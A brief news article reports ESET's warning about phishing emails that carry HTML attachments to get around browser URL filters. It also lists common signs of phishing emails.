Give a man a virus and he'll wreak havoc on a single machine. But teach a man to phish and, well, he'll become a pain in the ass for potentially thousands of computer users. Unfortunately, phishing is a 'skill' every two-bit hacker acquires right off the bat, but not all of them move on to bigger and more insidious things. Some phishers concentrate on honing their craft in hopes of not only ensnaring the gullible and less computer savvy, but even sophisticated ones. Security firm ESET warns of a new phishing method that has popped up in the last few weeks.
Phishers are now using booby-trapped "htm" and html" attachments, the latest in an evolution of phishing scams that have evolved from asking users to type personal information directly in the body of an email to direct links to obfuscated links, and now the attachment of html code. Why go this route? ESET gives two main reasons:
Executing the html code locally will not have your browser go to a website and thus the URL reputation filter will not be applied.
Executing the html code locally for the browser means it is loaded from an Intranet rather than from the Internet. Settings are usually less strict for files started/loaded from an Intranet.
Despite the new method of phishing, some of the old telltale signs remain, like poor grammar and giveaways such as addressing a potential victim as "Dear Paypal Member" instead of addressing them by name, as legitimate organizations typically do.
"We have already started to see e-mails where the reader is instructed to save the e-mail to the local system first, often to the Desktop for convenience, and then to execute or load them from there. But when the files are executed or loaded from the local system, the last safety-net provided by the mail program is bypassed," ESET warns.
In case you needed one, let this be a reminder to always be wary/suspicious of email attachments.